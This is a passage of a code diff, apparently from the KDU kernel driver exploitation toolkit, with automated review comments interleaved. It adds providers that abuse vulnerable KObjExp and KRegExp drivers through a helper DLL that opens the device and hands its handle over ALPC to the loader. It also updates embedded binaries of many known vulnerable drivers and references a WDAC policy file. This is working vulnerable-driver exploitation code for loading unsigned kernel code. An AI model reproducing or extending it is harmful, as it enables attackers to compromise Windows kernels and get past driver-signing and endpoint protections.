+* Purpose:
+*
+* ALPC receive message callback for IPC_GET_HANDLE case.
+*
+*/
+VOID CALLBACK supIpcDuplicateHandleCallback(
+ _In_ PCLIENT_ID ClientId,
+ _In_ PKDU_MSG Message,
+ _In_opt_ PVOID UserContext
+)
+{
+ KDU_CONTEXT* Context = (PKDU_CONTEXT)UserContext;
+
+ if (Context == NULL)
+ return;
+
+ __try {
+
+ if (Message->Function == IPC_GET_HANDLE &&
+ Message->Status == STATUS_SECRET_TOO_LONG)
+ {
+ HANDLE hProcess = NULL, hNewHandle = NULL;
+ OBJECT_ATTRIBUTES obja;
+
+ InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);
+
+ if (NT_SUCCESS(NtOpenProcess(&hProcess,
+ PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE | PROCESS_TERMINATE,
+ &obja,
+ ClientId)))
+ {
+ PVOID wow64Information = NULL;
+ ULONG returnLength;
+ BOOL validLength = FALSE;
+
+ if (NT_SUCCESS(NtQueryInformationProcess(hProcess,
+ ProcessWow64Information,
+ &wow64Information,
+ sizeof(wow64Information),
+ &returnLength)))
+ {
+ if (wow64Information == NULL)
+ validLength = (Message->ReturnedLength == sizeof(HANDLE));
+ else
+ validLength = (Message->ReturnedLength == sizeof(ULONG));
+
+ if (validLength) {
+
+ if (NT_SUCCESS(NtDuplicateObject(
+ hProcess,
+ (HANDLE)Message->Data,
+ NtCurrentProcess(),
+ &hNewHandle,
+ 0,
+ 0,
+ DUPLICATE_SAME_ACCESS)))
+ {
+ Context->DeviceHandle = hNewHandle;
+ }
+
+ }
+
+ }
+ NtTerminateProcess(hProcess, STATUS_TOO_MANY_SECRETS);
+ NtClose(hProcess);
+ }
+
+ }
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ return;
+ }
+}
diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h
index 3b96aa7..73adc75 100644
--- a/Source/Hamakaze/sup.h
+++ b/Source/Hamakaze/sup.h
@@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
-* VERSION: 1.31
+* VERSION: 1.32
*
-* DATE: 08 Apr 2023
+* DATE: 10 Jun 2023
*
* Support routines header file.
*
@@ -42,7 +42,7 @@ typedef BOOL(CALLBACK* pfnOpenProcessCallback)(
typedef BOOL(CALLBACK* pfnDuplicateHandleCallback)(
_In_ HANDLE DeviceHandle,
_In_ HANDLE SourceProcessId, //some drivers need pid not handle
- _In_ HANDLE SourceProcessHandle,
+ _In_opt_ HANDLE SourceProcessHandle,
_In_ HANDLE SourceHandle,
_Out_ PHANDLE TargetHandle,
_In_ ACCESS_MASK DesiredAccess,
@@ -138,6 +138,11 @@ BOOL WINAPI supReadWritePhysicalMemory(
_In_ ULONG NumberOfBytes,
_In_ BOOLEAN DoWrite);
+BOOL WINAPI supOpenPhysicalMemory2(
+ _In_ HANDLE DeviceHandle,
+ _In_ pfnDuplicateHandleCallback DuplicateHandleCallback,
+ _Out_ PHANDLE PhysicalMemoryHandle);
+
BOOL WINAPI supOpenPhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ pfnOpenProcessCallback OpenProcessCallback,
@@ -386,3 +391,12 @@ VOID supShowHardError(
VOID supShowWin32Error(
_In_ LPCSTR Message,
_In_ DWORD Win32Error);
+
+VOID CALLBACK supIpcOnException(
+ _In_ ULONG ExceptionCode,
+ _In_opt_ PVOID UserContext);
+
+VOID CALLBACK supIpcDuplicateHandleCallback(
+ _In_ PCLIENT_ID ClientId,
+ _In_ PKDU_MSG Message,
+ _In_opt_ PVOID UserContext);
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index 69c68b9..09e1c27 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -188,7 +188,7 @@ VOID KDUTest()
// KDUTestLoad();
// TestSymbols();
- Context = KDUProviderCreate(36,
+ Context = KDUProviderCreate(38,
FALSE,
NT_WIN10_20H1,
KDU_SHELLCODE_V1,
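Review bot: `KDUProviderCreate(38,` hard-codes a provider index that this same commit names in Source/Shared/consts.h as `KDU_PROVIDER_KREGEXP`. The literal silently points at a different provider as soon as the table is reordered. Assuming tests.cpp already sees the shared constants, the call should read `Context = KDUProviderCreate(KDU_PROVIDER_KREGEXP,`. `KDUTest` begins and ends outside this hunk.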
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index 8a63999..e602a21 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -6,7 +6,7 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
* Global consts.
*
@@ -27,10 +27,13 @@
#define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1
#define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined
+#define IPC_GET_HANDLE 0x1337
+
#define KDU_SYNC_MUTANT 0x2306
#define NT_REG_PREP L"\\Registry\\Machine"
#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
+#define WDAC_POLICY_FILE L"\\systemroot\\system32\\CodeIntegrity\\driversipolicy.p7b"
#define PROCEXP152 L"PROCEXP152"
#define PROCEXP1627_DESC L"Process Explorer v16"
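Review bot: `IPC_GET_HANDLE` is added here in the shared header, but the same commit also keeps a local `#define IPC_GET_HANDLE 0x1337` in Source/Taigei/ipc.cpp (renamed there from `DBK_GET_HANDLE`). The message identifier therefore lives in two places, and the two ends of the channel can drift apart if only one is edited. If ipc.cpp's `global.h` already pulls in the shared consts.h (not visible in this diff), the local define can simply be dropped; otherwise include the shared header there instead of repeating the value.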
@@ -48,6 +51,9 @@
#define PHYMEM_BASE_DESC "PhyMem by akui"
#define RWEVERYTHING_BASE_DESC "RWEverything by ckimchan.tw"
+#define ZODIACON_SYSEXP_EXE L"SysExp.exe"
+#define ZODIACON_REGEXP_EXE L"RegExp.exe"
+
#define CPU_VENDOR_INTEL "GenuineIntel"
#define CPU_VENDOR_INTEL_LENGTH sizeof(CPU_VENDOR_INTEL) - sizeof(CHAR)
#define CPU_VENDOR_AMD "AuthenticAMD"
@@ -132,8 +138,8 @@
#define IDR_MSI_WINIO 137
#define IDR_HP_ETDSUPP 138
#define IDR_KEXPLORE 139
-#define IDR_RESERVED6 140
-#define IDR_RESERVED7 141
+#define IDR_KOBJEXP 140
+#define IDR_KREGEXP 141
#define IDR_RESERVED8 142
//
@@ -176,6 +182,8 @@
#define KDU_PROVIDER_MSI_WINIO 34
#define KDU_PROVIDER_HP_ETDSUPPORT 35
#define KDU_PROVIDER_KEXPLORE 36
+#define KDU_PROVIDER_KOBJEXP 37
+#define KDU_PROVIDER_KREGEXP 38
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
diff --git a/Source/Shared/ldr/ldr.cpp b/Source/Shared/ldr/ldr.cpp
index 6cea8c3..03c6fc9 100644
--- a/Source/Shared/ldr/ldr.cpp
+++ b/Source/Shared/ldr/ldr.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: LDR.CPP
*
-* VERSION: 1.13
+* VERSION: 1.14
*
-* DATE: 05 Feb 2022
+* DATE: 10 Jun 2023
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -122,41 +122,56 @@ LPVOID PELoaderGetProcAddress(
_In_ PCHAR RoutineName
)
{
- PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
- PIMAGE_FILE_HEADER fh1 = NULL;
- PIMAGE_OPTIONAL_HEADER32 oh32 = NULL;
- PIMAGE_OPTIONAL_HEADER64 oh64 = NULL;
-
- USHORT OrdinalNumber;
- PULONG NameTableBase;
- PUSHORT NameOrdinalTableBase;
- PULONG Addr;
- LONG Result;
- ULONG High, Low, Middle = 0;
-
- fh1 = (PIMAGE_FILE_HEADER)((ULONG_PTR)ImageBase + ((PIMAGE_DOS_HEADER)ImageBase)->e_lfanew + sizeof(DWORD));
- oh32 = (PIMAGE_OPTIONAL_HEADER32)((ULONG_PTR)fh1 + sizeof(IMAGE_FILE_HEADER));
- oh64 = (PIMAGE_OPTIONAL_HEADER64)oh32;
-
- if (fh1->Machine == IMAGE_FILE_MACHINE_AMD64) {
- ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)ImageBase +
- oh64->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+ PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
+ USHORT OrdinalNumber;
+ PULONG NameTableBase;
+ PUSHORT NameOrdinalTableBase;
+ PULONG Addr;
+ LONG Result;
+ ULONG High, Low, Middle = 0;
+
+ union {
+ PIMAGE_NT_HEADERS64 nt64;
+ PIMAGE_NT_HEADERS32 nt32;
+ PIMAGE_NT_HEADERS nt;
+ } NtHeaders;
+
+ NtHeaders.nt = RtlImageNtHeader(ImageBase);
+
+ if (NtHeaders.nt == NULL) {
+ SetLastError((DWORD)STATUS_ACCESS_VIOLATION);
+ return NULL;
+ }
+
+ if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) {
+
+ ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer(ImageBase,
+ NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+
+ }
+ else if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) {
+
+ ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer(ImageBase,
+ NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
}
- else {
- ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)ImageBase +
- oh32->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+ else
+ {
+ SetLastError(ERROR_UNSUPPORTED_TYPE);
+ return NULL;
}
- NameTableBase = (PULONG)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfNames);
- NameOrdinalTableBase = (PUSHORT)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfNameOrdinals);
+ NameTableBase = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNames);
+ NameOrdinalTableBase = (PUSHORT)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNameOrdinals);
Low = 0;
High = ExportDirectory->NumberOfNames - 1;
while (High >= Low) {
+
Middle = (Low + High) >> 1;
+
Result = _strcmp_a(
RoutineName,
- (char*)ImageBase + NameTableBase[Middle]
- );
+ (char*)RtlOffsetToPointer(ImageBase, NameTableBase[Middle]));
+
if (Result < 0) {
High = Middle - 1;
}
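Review bot: The rewritten header lookup in `PELoaderGetProcAddress` now rejects a missing NT header and an unknown machine type, but the export directory is still used without checking that the data-directory entry is populated. A `VirtualAddress` of 0 makes `ExportDirectory` alias `ImageBase`, and `High = ExportDirectory->NumberOfNames - 1` wraps to 0xFFFFFFFF when the image exports no names, so the binary search indexes past the name table. A guard such as `if (ExportDirectory->NumberOfNames == 0) return NULL;` before the loop, plus a zero check on the directory RVA, would close both. The new `SetLastError((DWORD)STATUS_ACCESS_VIOLATION)` also stores an NTSTATUS in the Win32 last-error slot, while the sibling branch uses the Win32 code `ERROR_UNSUPPORTED_TYPE`. The function starts before this hunk and continues in the following ones.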
@@ -168,7 +183,7 @@ LPVOID PELoaderGetProcAddress(
break;
}
}
- } //while
+ }
if (High < Low)
return NULL;
@@ -176,6 +191,6 @@ LPVOID PELoaderGetProcAddress(
if ((ULONG)OrdinalNumber >= ExportDirectory->NumberOfFunctions)
return NULL;
- Addr = (PULONG)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfFunctions);
- return (LPVOID)((PBYTE)ImageBase + Addr[OrdinalNumber]);
+ Addr = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfFunctions);
+ return (LPVOID)RtlOffsetToPointer(ImageBase, Addr[OrdinalNumber]);
}
diff --git a/Source/Taigei/Taigei.vcxproj b/Source/Taigei/Taigei.vcxproj
index 6ae0f5c..5fa8fbf 100644
--- a/Source/Taigei/Taigei.vcxproj
+++ b/Source/Taigei/Taigei.vcxproj
@@ -323,6 +323,7 @@
+
diff --git a/Source/Taigei/Taigei.vcxproj.filters b/Source/Taigei/Taigei.vcxproj.filters
index a3c89b0..a24223e 100644
--- a/Source/Taigei/Taigei.vcxproj.filters
+++ b/Source/Taigei/Taigei.vcxproj.filters
@@ -45,6 +45,9 @@
Source Files
+
+ minirtl
+
diff --git a/Source/Taigei/export.def b/Source/Taigei/export.def
index ca66226..f6c8b04 100644
--- a/Source/Taigei/export.def
+++ b/Source/Taigei/export.def
@@ -8,3 +8,4 @@ SB_SMS_WriteBlockEx = StubFunc
SB_SMS_GetCtrlCountEx = StubFunc
SB_SMS_QuickCommandEx = StubFunc
RegisterForProvider = UnlockAsIO
+RegisterForProvider2 = ExecutableMain
diff --git a/Source/Taigei/ipc.cpp b/Source/Taigei/ipc.cpp
index 92a0dd5..8a34691 100644
--- a/Source/Taigei/ipc.cpp
+++ b/Source/Taigei/ipc.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: IPC.CPP
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 10 Feb 2022
+* DATE: 10 Jun 2023
*
* Inter-process communication.
*
@@ -19,7 +19,7 @@
#include "global.h"
-#define DBK_GET_HANDLE 0x1337
+#define IPC_GET_HANDLE 0x1337
NTSTATUS IpcConnectToPort(
_In_ LPCWSTR PortName,
@@ -102,7 +102,7 @@ VOID IpcSendHandleToServer(
if (NT_SUCCESS(ntStatus)) {
ntStatus = IpcSendReply(portHandle,
- DBK_GET_HANDLE,
+ IPC_GET_HANDLE,
(ULONG64)ProcessHandle,
sizeof(ProcessHandle),
STATUS_SECRET_TOO_LONG);
diff --git a/Source/Taigei/main.cpp b/Source/Taigei/main.cpp
index 2e7207a..fbe403a 100644
--- a/Source/Taigei/main.cpp
+++ b/Source/Taigei/main.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 10 Feb 2022
+* DATE: 10 June 2023
*
* Taigei helper dll (part of KDU project).
*
@@ -34,6 +34,92 @@ VOID WINAPI StubFunc(
}
+#define ZODIACON_KOBJEXP L"\\Device\\KObjExp"
+#define ZODIACON_KREGEXP L"\\Device\\KRegExp"
+
+/*
+* ExecutableMain
+*
+* Purpose:
+*
+* Entry point for exe mode.
+*
+*/
+int ExecutableMain()
+{
+#define EXPORT
+
+ LPWSTR* lpszArgList;
+ LPWSTR lpTargetDevice;
+ ULONG ulKey = 0;
+ INT nArgs = 0;
+
+ lpszArgList = CommandLineToArgvW(GetCommandLineW(), &nArgs);
+ if (lpszArgList) {
+
+ if (nArgs > 0) {
+
+ ulKey = _strtoul(lpszArgList[0]);
+
+ switch (ulKey) {
+ case 1:
+ lpTargetDevice = (LPWSTR)ZODIACON_KREGEXP;
+ break;
+ case 0:
+ default:
+ lpTargetDevice = (LPWSTR)ZODIACON_KOBJEXP;
+ break;
+ }
+
+ HANDLE deviceHandle;
+ NTSTATUS ntStatus;
+ UNICODE_STRING deviceName;
+ IO_STATUS_BLOCK ioStatusBlock;
+ OBJECT_ATTRIBUTES objectAttributes;
+ LARGE_INTEGER liTimeOut;
+
+ RtlInitUnicodeString(&deviceName, lpTargetDevice);
+ InitializeObjectAttributes(&objectAttributes, &deviceName, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+ ntStatus = NtCreateFile(&deviceHandle,
+ GENERIC_READ | GENERIC_WRITE,
+ &objectAttributes,
+ &ioStatusBlock,
+ NULL,
+ 0,
+ 0,
+ FILE_OPEN,
+ 0,
+ NULL,
+ 0);
+
+ if (NT_SUCCESS(ntStatus)) {
+
+ IpcSendHandleToServer(deviceHandle);
+
+ liTimeOut.QuadPart = UInt32x32To64(3000, 10000);
+ liTimeOut.QuadPart *= -1;
+
+ //
+ // Infinite loop.
+ //
+ while (TRUE) {
+ NtDelayExecution(0, (PLARGE_INTEGER)&liTimeOut);
+ }
+
+ ///
+ // Never here.
+ //
+ }
+
+ }
+
+ LocalFree((HLOCAL)lpszArgList);
+ }
+
+ ExitProcess(0);
+}
+
#ifdef _WIN64
/*
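Review bot: `ulKey = _strtoul(lpszArgList[0]);` in `ExecutableMain` parses the first element of the argument vector, which for a conventionally built command line is the program path rather than a parameter. If the launcher deliberately passes the key as the entire command line, a comment saying so is needed, because the code otherwise reads as an off-by-one. The `#define EXPORT` at the top of the body has no visible use in this hunk and is never undefined, so it leaks into the rest of the translation unit. The `///` opening the "Never here" comment is a typo for `//`.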
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index 85b8fe7..ba9842c 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -207,7 +207,9 @@
+
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index bc347af..e5ae477 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -169,6 +169,12 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/AsusCertService.bin b/Source/Tanikaze/data/AsusCertService.bin
index 21b4ba3..4d5f0cb 100644
Binary files a/Source/Tanikaze/data/AsusCertService.bin and b/Source/Tanikaze/data/AsusCertService.bin differ
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index 195ca5b..0089059 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index caae920..dbc0ed2 100644
Binary files a/Source/Tanikaze/data/KMUSIG.bin and b/Source/Tanikaze/data/KMUSIG.bin differ
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index 01239dc..4cfddfd 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index d39250c..1d88ce3 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index 0bc87e7..6df9520 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin
index dfc715f..6e44f07 100644
Binary files a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin and b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index fc895f4..942f0bb 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index 58a373e..3462c9c 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index ad77473..1f8c071 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index d97a98c..36b378d 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index 7f9abed..f2696d9 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index 96786e2..ee1bc1e 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 7bc2f3a..b561c00 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index 5371cbe..c1333c8 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index 2dbe113..1e37369 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index 4db3af4..c783c14 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/KExplore.bin b/Source/Tanikaze/drv/KExplore.bin
index 00f1678..c298cce 100644
Binary files a/Source/Tanikaze/drv/KExplore.bin and b/Source/Tanikaze/drv/KExplore.bin differ
diff --git a/Source/Tanikaze/drv/KObjExp.bin b/Source/Tanikaze/drv/KObjExp.bin
new file mode 100644
index 0000000..cc8cbda
Binary files /dev/null and b/Source/Tanikaze/drv/KObjExp.bin differ
diff --git a/Source/Tanikaze/drv/KRegExp.bin b/Source/Tanikaze/drv/KRegExp.bin
new file mode 100644
index 0000000..b7ebf22
Binary files /dev/null and b/Source/Tanikaze/drv/KRegExp.bin differ
diff --git a/Source/Tanikaze/drv/LDD.bin b/Source/Tanikaze/drv/LDD.bin
index 6e2f2c1..ce2f580 100644
Binary files a/Source/Tanikaze/drv/LDD.bin and b/Source/Tanikaze/drv/LDD.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index a15e6f2..8ef38b5 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index d6301dd..51f97a9 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 4492206..934d009 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index 9021015..235e7a6 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index 96edd16..af1b85a 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 6a3d851..50c4862 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index 38ead54..cd40a20 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index 0b4a3e9..c5c7477 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 6850e7c..1c863f5 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index fbf6832..6ec1e62 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/etdsupp.bin b/Source/Tanikaze/drv/etdsupp.bin
index dc74968..8c408cd 100644
Binary files a/Source/Tanikaze/drv/etdsupp.bin and b/Source/Tanikaze/drv/etdsupp.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index 78726b3..b456a6f 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index 9ab9a30..782e357 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/heavenluo.bin b/Source/Tanikaze/drv/heavenluo.bin
index e54f936..80eaf49 100644
Binary files a/Source/Tanikaze/drv/heavenluo.bin and b/Source/Tanikaze/drv/heavenluo.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index 610d2e7..a493f01 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index a3056d7..896ff00 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index e917666..70fedb4 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index 44fb460..3420a9e 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index ce7ab69..85fe6b7 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/pcdsrvc_x64.bin b/Source/Tanikaze/drv/pcdsrvc_x64.bin
index c709d65..55cfd2e 100644
Binary files a/Source/Tanikaze/drv/pcdsrvc_x64.bin and b/Source/Tanikaze/drv/pcdsrvc_x64.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
index adc800b..d8c5c9d 100644
Binary files a/Source/Tanikaze/drv/physmem.bin and b/Source/Tanikaze/drv/physmem.bin differ
diff --git a/Source/Tanikaze/drv/procexp1627.bin b/Source/Tanikaze/drv/procexp1627.bin
index 0caef07..ecc7c6e 100644
Binary files a/Source/Tanikaze/drv/procexp1627.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
index be37ca0..1c19034 100644
Binary files a/Source/Tanikaze/drv/procexp1702.bin and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index 66f4b16..4550290 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index 91bffd4..f6ad603 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -38,6 +38,8 @@
#define IDR_MSI_WINIO 137
#define IDR_HP_ETDSUPP 138
#define IDR_KEXPLORE 139
+#define IDR_KOBJEXP 140
+#define IDR_KREGEXP 141
#define IDR_DATA_DBUTILCAT 1000
#define IDR_DATA_DBUTILINF 1001
#define IDR_DATA_KMUEXE 1002
@@ -50,7 +52,7 @@
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 140
+#define _APS_NEXT_RESOURCE_VALUE 142
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1007
